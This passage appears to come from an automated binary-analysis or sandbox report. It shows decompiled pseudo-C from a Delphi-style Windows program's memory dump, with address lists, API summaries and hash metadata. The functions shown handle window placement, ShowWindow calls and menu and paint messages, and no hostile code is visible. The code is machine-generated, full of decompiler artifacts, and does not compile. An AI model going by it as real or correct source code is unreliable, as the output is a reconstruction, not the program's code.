                                                                        									ShowWindow(E0043CC2C(_v8), 0);
                                                                        								} else {
                                                                        									SetWindowPos(E0043CC2C(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                        									SetActiveWindow(_t299);
                                                                        								}
                                                                        							} else {
                                                                        								SetWindowPos(E0043CC2C(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                        							}
                                                                        						} else {
                                                                        							E0043A2A8(_v8);
                                                                        						}
                                                                        					} else {
                                                                        						_push(_t372);
                                                                        						_push(0x452a2c);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t374;
                                                                        						E004037D8(_v8, _t378);
                                                                        						 *[fs:eax] = 0;
                                                                        						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                                                        							if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                        								_t301 = E004541A4() -  *(_v8 + 0x48);
                                                                        								__eflags = _t301;
                                                                        								_t302 = _t301 >> 1;
                                                                        								if(_t301 < 0) {
                                                                        									asm("adc ebx, 0x0");
                                                                        								}
                                                                        								_t198 = E00454198() -  *(_v8 + 0x4c);
                                                                        								__eflags = _t198;
                                                                        								_t199 = _t198 >> 1;
                                                                        								if(_t198 < 0) {
                                                                        									asm("adc eax, 0x0");
                                                                        								}
                                                                        							} else {
                                                                        								_t241 =  *0x496c04; // 0x2170d40
                                                                        								_t305 = E00435FB0( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                                                        								_t302 = _t305 >> 1;
                                                                        								if(_t305 < 0) {
                                                                        									asm("adc ebx, 0x0");
                                                                        								}
                                                                        								_t245 =  *0x496c04; // 0x2170d40
                                                                        								_t248 = E00435FF4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                                                        								_t199 = _t248 >> 1;
                                                                        								if(_t248 < 0) {
                                                                        									asm("adc eax, 0x0");
                                                                        								}
                                                                        							}
                                                                        							if(_t302 < 0) {
                                                                        								_t302 = 0;
                                                                        							}
                                                                        							if(_t199 < 0) {
                                                                        								_t199 = 0;
                                                                        							}
                                                                        							_t326 = _t199;
                                                                        							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                        							if( *((char*)(_v8 + 0x57)) != 0) {
                                                                        								E00450E14(_v8, _t326);
                                                                        							}
                                                                        						} else {
                                                                        							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                                                        							__eflags = _t251 + 0xfa - 2;
                                                                        							if(_t251 + 0xfa - 2 >= 0) {
                                                                        								__eflags = _t251 - 5;
                                                                        								if(_t251 == 5) {
                                                                        									_t252 = _v8;
                                                                        									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                                                        									if( *((char*)(_t252 + 0x22f)) != 1) {
                                                                        										_t307 = E004541D4() -  *(_v8 + 0x48);
                                                                        										__eflags = _t307;
                                                                        										_t308 = _t307 >> 1;
                                                                        										if(_t307 < 0) {
                                                                        											asm("adc ebx, 0x0");
                                                                        										}
                                                                        										_t258 = E004541C8() -  *(_v8 + 0x4c);
                                                                        										__eflags = _t258;
                                                                        										_t259 = _t258 >> 1;
                                                                        										if(_t258 < 0) {
                                                                        											asm("adc eax, 0x0");
                                                                        										}
                                                                        									} else {
                                                                        										_t262 =  *0x496c04; // 0x2170d40
                                                                        										_t311 = E00435FB0( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                                                        										__eflags = _t311;
                                                                        										_t308 = _t311 >> 1;
                                                                        										if(_t311 < 0) {
                                                                        											asm("adc ebx, 0x0");
                                                                        										}
                                                                        										_t266 =  *0x496c04; // 0x2170d40
                                                                        										_t269 = E00435FF4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                                                        										__eflags = _t269;
                                                                        										_t259 = _t269 >> 1;
                                                                        										if(_t269 < 0) {
                                                                        											asm("adc eax, 0x0");
                                                                        										}
                                                                        									}
                                                                        									__eflags = _t308;
                                                                        									if(_t308 < 0) {
                                                                        										_t308 = 0;
                                                                        										__eflags = 0;
                                                                        									}
                                                                        									__eflags = _t259;
                                                                        									if(_t259 < 0) {
                                                                        										_t259 = 0;
                                                                        										__eflags = 0;
                                                                        									}
                                                                        									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                        								}
                                                                        							} else {
                                                                        								_t270 =  *0x496c04; // 0x2170d40
                                                                        								_t370 =  *(_t270 + 0x44);
                                                                        								_t271 = _v8;
                                                                        								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                                                        								if( *((char*)(_t271 + 0x230)) == 7) {
                                                                        									_t362 =  *0x44c130; // 0x44c17c
                                                                        									_t290 = E00403768( *(_v8 + 4), _t362);
                                                                        									__eflags = _t290;
                                                                        									if(_t290 != 0) {
                                                                        										_t370 =  *(_v8 + 4);
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t370;
                                                                        								if(_t370 == 0) {
                                                                        									_t313 = E004541A4() -  *(_v8 + 0x48);
                                                                        									__eflags = _t313;
                                                                        									_t314 = _t313 >> 1;
                                                                        									if(_t313 < 0) {
                                                                        										asm("adc ebx, 0x0");
                                                                        									}
                                                                        									_t277 = E00454198() -  *(_v8 + 0x4c);
                                                                        									__eflags = _t277;
                                                                        									_t278 = _t277 >> 1;
                                                                        									if(_t277 < 0) {
                                                                        										asm("adc eax, 0x0");
                                                                        									}
                                                                        								} else {
                                                                        									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                                                        									__eflags = _t317;
                                                                        									_t318 = _t317 >> 1;
                                                                        									if(_t317 < 0) {
                                                                        										asm("adc ebx, 0x0");
                                                                        									}
                                                                        									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                                                        									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
                                                                        									__eflags = _t286;
                                                                        									_t287 = _t286 >> 1;
                                                                        									if(_t286 < 0) {
                                                                        										asm("adc eax, 0x0");
                                                                        									}
                                                                        									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                                                        								}
                                                                        								__eflags = _t314;
                                                                        								if(_t314 < 0) {
                                                                        									_t314 = 0;
                                                                        									__eflags = 0;
                                                                        								}
                                                                        								__eflags = _t278;
                                                                        								if(_t278 < 0) {
                                                                        									_t278 = 0;
                                                                        									__eflags = 0;
                                                                        								}
                                                                        								_t328 = _t278;
                                                                        								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                        								_t281 = _v8;
                                                                        								__eflags =  *((char*)(_t281 + 0x57));
                                                                        								if( *((char*)(_t281 + 0x57)) != 0) {
                                                                        									E00450E14(_v8, _t328);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						 *((char*)(_v8 + 0x230)) = 0;
                                                                        						if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                        							ShowWindow(E0043CC2C(_v8),  *(0x47ab74 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                        						} else {
                                                                        							if( *(_v8 + 0x22b) != 2) {
                                                                        								ShowWindow(E0043CC2C(_v8),  *(0x47ab74 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                        								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                                                        								__eflags = _t220;
                                                                        								CallWindowProcA(0x406d84, E0043CC2C(_v8), 5, 0, _t220);
                                                                        								E0043680C();
                                                                        							} else {
                                                                        								_t231 = E0043CC2C(_v8);
                                                                        								_t232 =  *0x496c04; // 0x2170d40
                                                                        								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                                                        								ShowWindow(E0043CC2C(_v8), 3);
                                                                        							}
                                                                        							_t226 =  *0x496c04; // 0x2170d40
                                                                        							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_pop(_t331);
                                                                        				 *[fs:eax] = _t331;
                                                                        				_push(0x452ec8);
                                                                        				_t154 = _v8;
                                                                        				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
                                                                        				return _t154;
                                                                        			}
                                                                        0x00452e8c
                                                                        0x00452e92
                                                                        0x00452e92
                                                                        0x00452e1b
                                                                        0x00452e33
                                                                        0x00452e33
                                                                        0x00452e02
                                                                        0x00452e05
                                                                        0x00452e05
                                                                        0x00452a08
                                                                        0x00452a0a
                                                                        0x00452a0b
                                                                        0x00452a10
                                                                        0x00452a13
                                                                        0x00452a1d
                                                                        0x00452a27
                                                                        0x00452a4d
                                                                        0x00452a79
                                                                        0x00452ac2
                                                                        0x00452ac2
                                                                        0x00452ac5
                                                                        0x00452ac7
                                                                        0x00452ac9
                                                                        0x00452ac9
                                                                        0x00452ad9
                                                                        0x00452ad9
                                                                        0x00452adc
                                                                        0x00452ade
                                                                        0x00452ae0
                                                                        0x00452ae0
                                                                        0x00452a7b
                                                                        0x00452a7b
                                                                        0x00452a8d
                                                                        0x00452a90
                                                                        0x00452a92
                                                                        0x00452a94
                                                                        0x00452a94
                                                                        0x00452a97
                                                                        0x00452aa7
                                                                        0x00452aaa
                                                                        0x00452aac
                                                                        0x00452aae
                                                                        0x00452aae
                                                                        0x00452aac
                                                                        0x00452ae5
                                                                        0x00452ae7
                                                                        0x00452ae7
                                                                        0x00452aeb
                                                                        0x00452aed
                                                                        0x00452aed
                                                                        0x00452afd
                                                                        0x00452b06
                                                                        0x00452b13
                                                                        0x00452b1c
                                                                        0x00452b1c
                                                                        0x00452b26
                                                                        0x00452b29
                                                                        0x00452b34
                                                                        0x00452b37
                                                                        0x00452c0b
                                                                        0x00452c0d
                                                                        0x00452c13
                                                                        0x00452c16
                                                                        0x00452c1d
                                                                        0x00452c66
                                                                        0x00452c66
                                                                        0x00452c69
                                                                        0x00452c6b
                                                                        0x00452c6d
                                                                        0x00452c6d
                                                                        0x00452c7d
                                                                        0x00452c7d
                                                                        0x00452c80
                                                                        0x00452c82
                                                                        0x00452c84
                                                                        0x00452c84
                                                                        0x00452c1f
                                                                        0x00452c1f
                                                                        0x00452c31
                                                                        0x00452c31
                                                                        0x00452c34
                                                                        0x00452c36
                                                                        0x00452c38
                                                                        0x00452c38
                                                                        0x00452c3b
                                                                        0x00452c4b
                                                                        0x00452c4b
                                                                        0x00452c4e
                                                                        0x00452c50
                                                                        0x00452c52
                                                                        0x00452c52
                                                                        0x00452c50
                                                                        0x00452c87
                                                                        0x00452c89
                                                                        0x00452c8b
                                                                        0x00452c8b
                                                                        0x00452c8b
                                                                        0x00452c8d
                                                                        0x00452c8f
                                                                        0x00452c91
                                                                        0x00452c91
                                                                        0x00452c91
                                                                        0x00452caa
                                                                        0x00452caa
                                                                        0x00452b3d
                                                                        0x00452b3d
                                                                        0x00452b42
                                                                        0x00452b45
                                                                        0x00452b48
                                                                        0x00452b4f
                                                                        0x00452b57
                                                                        0x00452b5d
                                                                        0x00452b62
                                                                        0x00452b64
                                                                        0x00452b69
                                                                        0x00452b69
                                                                        0x00452b64
                                                                        0x00452b6c
                                                                        0x00452b6e
                                                                        0x00452ba7
                                                                        0x00452ba7
                                                                        0x00452baa
                                                                        0x00452bac
                                                                        0x00452bae
                                                                        0x00452bae
                                                                        0x00452bbe
                                                                        0x00452bbe
                                                                        0x00452bc1
                                                                        0x00452bc3
                                                                        0x00452bc5
                                                                        0x00452bc5
                                                                        0x00452b70
                                                                        0x00452b76
                                                                        0x00452b76
                                                                        0x00452b79
                                                                        0x00452b7b
                                                                        0x00452b7d
                                                                        0x00452b7d
                                                                        0x00452b80
                                                                        0x00452b89
                                                                        0x00452b89
                                                                        0x00452b8c
                                                                        0x00452b8e
                                                                        0x00452b90
                                                                        0x00452b90
                                                                        0x00452b93
                                                                        0x00452b93
                                                                        0x00452bc8
                                                                        0x00452bca
                                                                        0x00452bcc
                                                                        0x00452bcc
                                                                        0x00452bcc
                                                                        0x00452bce
                                                                        0x00452bd0
                                                                        0x00452bd2
                                                                        0x00452bd2
                                                                        0x00452bd2
                                                                        0x00452be2
                                                                        0x00452beb
                                                                        0x00452bf1
                                                                        0x00452bf4
                                                                        0x00452bf8
                                                                        0x00452c01
                                                                        0x00452c01
                                                                        0x00452bf8
                                                                        0x00452b37
                                                                        0x00452cb3
                                                                        0x00452cc4
                                                                        0x00452d9a
                                                                        0x00452cca
                                                                        0x00452cd4
                                                                        0x00452d27
                                                                        0x00452d3b
                                                                        0x00452d3b
                                                                        0x00452d50
                                                                        0x00452d58
                                                                        0x00452cd6
                                                                        0x00452cdb
                                                                        0x00452ce6
                                                                        0x00452cf5
                                                                        0x00452d05
                                                                        0x00452d05
                                                                        0x00452d66
                                                                        0x00452d75
                                                                        0x00452d75
                                                                        0x00452cc4
                                                                        0x00452a02
                                                                        0x00452eab
                                                                        0x00452eae
                                                                        0x00452eb1
                                                                        0x00452eb6
                                                                        0x00452eb9
                                                                        0x00452ec0

                                                                        APIs
                                                                        • SendMessageA.USER32 ref: 00452CF5
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: LoadMessageSendString
                                                                        • String ID:
                                                                        • API String ID: 1946433856-0
                                                                        • Opcode ID: 717acc6c25fd58546519ffb373e4bf667c7c6554064bb9ea9fc5b4701ab0a2bc
                                                                        • Instruction ID: d82fd93d8c37f43bf0d08f362bbfae17662a6fc41c918366e4d92ba17f68ed98
                                                                        • Opcode Fuzzy Hash: 717acc6c25fd58546519ffb373e4bf667c7c6554064bb9ea9fc5b4701ab0a2bc
                                                                        • Instruction Fuzzy Hash: C9F16130A00204EFDB01DFA9CA85B5E77F5AB09305F2540B6E904AB363D779EE45DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0043CF3C(void* __eax) {
                                                                        				void* _v28;
                                                                        				struct _WINDOWPLACEMENT _v56;
                                                                        				struct tagPOINT _v64;
                                                                        				intOrPtr _v68;
                                                                        				void* _t43;
                                                                        				struct HWND__* _t45;
                                                                        				struct tagPOINT* _t47;
                                                                        
                                                                        				_t47 =  &(_v64.y);
                                                                        				_t43 = __eax;
                                                                        				if(IsIconic( *(__eax + 0x180)) == 0) {
                                                                        					GetWindowRect( *(_t43 + 0x180), _t47);
                                                                        				} else {
                                                                        					_v56.length = 0x2c;
                                                                        					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        				}
                                                                        				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                                                                        					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                                                                        					if(_t45 != 0) {
                                                                        						ScreenToClient(_t45, _t47);
                                                                        						ScreenToClient(_t45,  &_v64);
                                                                        					}
                                                                        				}
                                                                        				 *(_t43 + 0x40) = _t47->x;
                                                                        				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                                                                        				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                                                                        				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                                                                        				return E00435C00(_t43);
                                                                        			}











                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                        • String ID: ,
                                                                        • API String ID: 2266315723-3772416878
                                                                        • Opcode ID: 0e429eb8ffffe6df52a8329525d030c4f3db782929e8d24c94ca2f27c20065be
                                                                        • Instruction ID: 459ab4c7249235b108c54b4c36eddf7638014fb9c7bbac68c80982844e868d89
                                                                        • Opcode Fuzzy Hash: 0e429eb8ffffe6df52a8329525d030c4f3db782929e8d24c94ca2f27c20065be
                                                                        • Instruction Fuzzy Hash: 55117F71504201ABCB01EF6DD8C5A8B77D8AF0D314F04462AFD58EB386D739E9048BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0044A3C8(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				struct HMENU__* _v12;
                                                                        				signed int _v16;
                                                                        				char _v17;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				struct HDC__* _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				intOrPtr* _v48;
                                                                        				char _v52;
                                                                        				intOrPtr _t137;
                                                                        				signed int _t138;
                                                                        				struct HWND__* _t144;
                                                                        				signed int _t150;
                                                                        				signed int _t151;
                                                                        				intOrPtr* _t153;
                                                                        				void* _t158;
                                                                        				struct HMENU__* _t160;
                                                                        				intOrPtr* _t165;
                                                                        				void* _t173;
                                                                        				signed int _t177;
                                                                        				signed int _t181;
                                                                        				void* _t182;
                                                                        				void* _t214;
                                                                        				void* _t252;
                                                                        				signed int _t258;
                                                                        				void* _t266;
                                                                        				signed int _t272;
                                                                        				signed int _t273;
                                                                        				signed int _t275;
                                                                        				signed int _t276;
                                                                        				signed int _t278;
                                                                        				signed int _t279;
                                                                        				signed int _t281;
                                                                        				signed int _t282;
                                                                        				signed int _t284;
                                                                        				signed int _t285;
                                                                        				signed int _t287;
                                                                        				signed int _t288;
                                                                        				signed int _t291;
                                                                        				signed int _t292;
                                                                        				intOrPtr _t308;
                                                                        				intOrPtr _t312;
                                                                        				intOrPtr _t334;
                                                                        				intOrPtr _t343;
                                                                        				intOrPtr _t347;
                                                                        				intOrPtr* _t354;
                                                                        				signed int _t356;
                                                                        				intOrPtr* _t357;
                                                                        				signed int _t368;
                                                                        				signed int _t369;
                                                                        				signed int _t370;
                                                                        				signed int _t371;
                                                                        				signed int _t372;
                                                                        				signed int _t373;
                                                                        				signed int _t374;
                                                                        				intOrPtr* _t376;
                                                                        				void* _t378;
                                                                        				void* _t379;
                                                                        				intOrPtr _t380;
                                                                        				void* _t381;
                                                                        
                                                                        				_t378 = _t379;
                                                                        				_t380 = _t379 + 0xffffffd0;
                                                                        				_v52 = 0;
                                                                        				_t376 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t378);
                                                                        				_push(0x44a8fb);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t380;
                                                                        				_t137 =  *__edx;
                                                                        				_t381 = _t137 - 0x111;
                                                                        				if(_t381 > 0) {
                                                                        					_t138 = _t137 - 0x117;
                                                                        					__eflags = _t138;
                                                                        					if(_t138 == 0) {
                                                                        						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        						__eflags = _t272;
                                                                        						if(_t272 < 0) {
                                                                        							goto L67;
                                                                        						} else {
                                                                        							_t273 = _t272 + 1;
                                                                        							_t368 = 0;
                                                                        							__eflags = 0;
                                                                        							while(1) {
                                                                        								_t150 = E00449774(E00414208(_v8, _t368),  *(_t376 + 4), __eflags);
                                                                        								__eflags = _t150;
                                                                        								if(_t150 != 0) {
                                                                        									goto L68;
                                                                        								}
                                                                        								_t368 = _t368 + 1;
                                                                        								_t273 = _t273 - 1;
                                                                        								__eflags = _t273;
                                                                        								if(_t273 != 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									goto L67;
                                                                        								}
                                                                        								goto L68;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t151 = _t138 - 8;
                                                                        						__eflags = _t151;
                                                                        						if(_t151 == 0) {
                                                                        							_v17 = 0;
                                                                        							__eflags =  *(__edx + 6) & 0x00000010;
                                                                        							if(( *(__edx + 6) & 0x00000010) != 0) {
                                                                        								_v17 = 1;
                                                                        							}
                                                                        							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        							__eflags = _t275;
                                                                        							if(__eflags < 0) {
                                                                        								L32:
                                                                        								_t153 =  *0x495ad0; // 0x496c04
                                                                        								E00456E5C( *_t153, 0, __eflags);
                                                                        								goto L67;
                                                                        							} else {
                                                                        								_t276 = _t275 + 1;
                                                                        								_t369 = 0;
                                                                        								__eflags = 0;
                                                                        								while(1) {
                                                                        									__eflags = _v17 - 1;
                                                                        									if(_v17 != 1) {
                                                                        										_v12 =  *(_t376 + 4) & 0x0000ffff;
                                                                        									} else {
                                                                        										_t160 =  *(_t376 + 8);
                                                                        										__eflags = _t160;
                                                                        										if(_t160 == 0) {
                                                                        											_v12 = 0xffffffff;
                                                                        										} else {
                                                                        											_v12 = GetSubMenu(_t160,  *(_t376 + 4) & 0x0000ffff);
                                                                        										}
                                                                        									}
                                                                        									_t158 = E00414208(_v8, _t369);
                                                                        									_t296 = _v17;
                                                                        									_v16 = E004496B8(_t158, _v17, _v12);
                                                                        									__eflags = _v16;
                                                                        									if(__eflags != 0) {
                                                                        										break;
                                                                        									}
                                                                        									_t369 = _t369 + 1;
                                                                        									_t276 = _t276 - 1;
                                                                        									__eflags = _t276;
                                                                        									if(__eflags != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L32;
                                                                        									}
                                                                        									goto L68;
                                                                        								}
                                                                        								E00433724( *((intOrPtr*)(_v16 + 0x58)), _t296,  &_v52, __eflags);
                                                                        								_t165 =  *0x495ad0; // 0x496c04
                                                                        								E00456E5C( *_t165, _v52, __eflags);
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t151 == 1;
                                                                        							if(_t151 == 1) {
                                                                        								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        								__eflags = _t278;
                                                                        								if(_t278 < 0) {
                                                                        									goto L67;
                                                                        								} else {
                                                                        									_t279 = _t278 + 1;
                                                                        									_t370 = 0;
                                                                        									__eflags = 0;
                                                                        									while(1) {
                                                                        										_v48 = E00414208(_v8, _t370);
                                                                        										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                                                        										__eflags = _t173 -  *(_t376 + 8);
                                                                        										if(_t173 ==  *(_t376 + 8)) {
                                                                        											break;
                                                                        										}
                                                                        										_t177 = E004496B8(_v48, 1,  *(_t376 + 8));
                                                                        										__eflags = _t177;
                                                                        										if(_t177 == 0) {
                                                                        											_t370 = _t370 + 1;
                                                                        											_t279 = _t279 - 1;
                                                                        											__eflags = _t279;
                                                                        											if(_t279 != 0) {
                                                                        												continue;
                                                                        											} else {
                                                                        												goto L67;
                                                                        											}
                                                                        										} else {
                                                                        											break;
                                                                        										}
                                                                        										goto L68;
                                                                        									}
                                                                        									E00449FB8(_v48, _t376);
                                                                        								}
                                                                        							} else {
                                                                        								goto L67;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L68;
                                                                        				} else {
                                                                        					if(_t381 == 0) {
                                                                        						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        						__eflags = _t281;
                                                                        						if(_t281 < 0) {
                                                                        							goto L67;
                                                                        						} else {
                                                                        							_t282 = _t281 + 1;
                                                                        							_t371 = 0;
                                                                        							__eflags = 0;
                                                                        							while(1) {
                                                                        								E00414208(_v8, _t371);
                                                                        								_t181 = E00449758( *(_t376 + 4), __eflags);
                                                                        								__eflags = _t181;
                                                                        								if(_t181 != 0) {
                                                                        									goto L68;
                                                                        								}
                                                                        								_t371 = _t371 + 1;
                                                                        								_t282 = _t282 - 1;
                                                                        								__eflags = _t282;
                                                                        								if(_t282 != 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									goto L67;
                                                                        								}
                                                                        								goto L68;
                                                                        							}
                                                                        						}
                                                                        						goto L68;
                                                                        					} else {
                                                                        						_t182 = _t137 - 0x2b;
                                                                        						if(_t182 == 0) {
                                                                        							_v40 =  *((intOrPtr*)(__edx + 8));
                                                                        							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        							__eflags = _t284;
                                                                        							if(_t284 < 0) {
                                                                        								goto L67;
                                                                        							} else {
                                                                        								_t285 = _t284 + 1;
                                                                        								_t372 = 0;
                                                                        								__eflags = 0;
                                                                        								while(1) {
                                                                        									_v16 = E004496B8(E00414208(_v8, _t372), 0,  *((intOrPtr*)(_v40 + 8)));
                                                                        									__eflags = _v16;
                                                                        									if(_v16 != 0) {
                                                                        										break;
                                                                        									}
                                                                        									_t372 = _t372 + 1;
                                                                        									_t285 = _t285 - 1;
                                                                        									__eflags = _t285;
                                                                        									if(_t285 != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L67;
                                                                        									}
                                                                        									goto L69;
                                                                        								}
                                                                        								_v24 = E0041FDA0(0, 1);
                                                                        								_push(_t378);
                                                                        								_push(0x44a72e);
                                                                        								_push( *[fs:eax]);
                                                                        								 *[fs:eax] = _t380;
                                                                        								_v28 = SaveDC( *(_v40 + 0x18));
                                                                        								_push(_t378);
                                                                        								_push(0x44a711);
                                                                        								_push( *[fs:eax]);
                                                                        								 *[fs:eax] = _t380;
                                                                        								E004207B0(_v24,  *(_v40 + 0x18));
                                                                        								E0042062C(_v24);
                                                                        								E0044ABA0(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                                                        								_pop(_t334);
                                                                        								 *[fs:eax] = _t334;
                                                                        								_push(0x44a718);
                                                                        								__eflags = 0;
                                                                        								E004207B0(_v24, 0);
                                                                        								return RestoreDC( *(_v40 + 0x18), _v28);
                                                                        							}
                                                                        						} else {
                                                                        							_t214 = _t182 - 1;
                                                                        							if(_t214 == 0) {
                                                                        								_v44 =  *((intOrPtr*)(__edx + 8));
                                                                        								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        								__eflags = _t287;
                                                                        								if(_t287 < 0) {
                                                                        									goto L67;
                                                                        								} else {
                                                                        									_t288 = _t287 + 1;
                                                                        									_t373 = 0;
                                                                        									__eflags = 0;
                                                                        									while(1) {
                                                                        										_v16 = E004496B8(E00414208(_v8, _t373), 0,  *((intOrPtr*)(_v44 + 8)));
                                                                        										__eflags = _v16;
                                                                        										if(_v16 != 0) {
                                                                        											break;
                                                                        										}
                                                                        										_t373 = _t373 + 1;
                                                                        										_t288 = _t288 - 1;
                                                                        										__eflags = _t288;
                                                                        										if(_t288 != 0) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L67;
                                                                        										}
                                                                        										goto L69;
                                                                        									}
                                                                        									_v32 = GetWindowDC( *(_v8 + 0x10));
                                                                        									 *[fs:eax] = _t380;
                                                                        									_v24 = E0041FDA0(0, 1);
                                                                        									 *[fs:eax] = _t380;
                                                                        									_v28 = SaveDC(_v32);
                                                                        									 *[fs:eax] = _t380;
                                                                        									E004207B0(_v24, _v32);
                                                                        									E0042062C(_v24);
                                                                        									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44a82f, _t378,  *[fs:eax], 0x44a84c, _t378,  *[fs:eax], 0x44a871, _t378);
                                                                        									_pop(_t343);
                                                                        									 *[fs:eax] = _t343;
                                                                        									_push(0x44a836);
                                                                        									__eflags = 0;
                                                                        									E004207B0(_v24, 0);
                                                                        									return RestoreDC(_v32, _v28);
                                                                        								}
                                                                        							} else {
                                                                        								if(_t214 == 0x27) {
                                                                        									_v36 =  *((intOrPtr*)(__edx + 8));
                                                                        									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        									__eflags = _t291;
                                                                        									if(_t291 < 0) {
                                                                        										goto L67;
                                                                        									} else {
                                                                        										_t292 = _t291 + 1;
                                                                        										_t374 = 0;
                                                                        										__eflags = 0;
                                                                        										while(1) {
                                                                        											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E00414208(_v8, _t374))) + 0x34))();
                                                                        											_t347 = _v36;
                                                                        											__eflags = _t252 -  *((intOrPtr*)(_t347 + 0xc));
                                                                        											if(_t252 !=  *((intOrPtr*)(_t347 + 0xc))) {
                                                                        												_v16 = E004496B8(E00414208(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                                                        											} else {
                                                                        												_v16 =  *((intOrPtr*)(E00414208(_v8, _t374) + 0x34));
                                                                        											}
                                                                        											__eflags = _v16;
                                                                        											if(_v16 != 0) {
                                                                        												break;
                                                                        											}
                                                                        											_t374 = _t374 + 1;
                                                                        											_t292 = _t292 - 1;
                                                                        											__eflags = _t292;
                                                                        											if(_t292 != 0) {
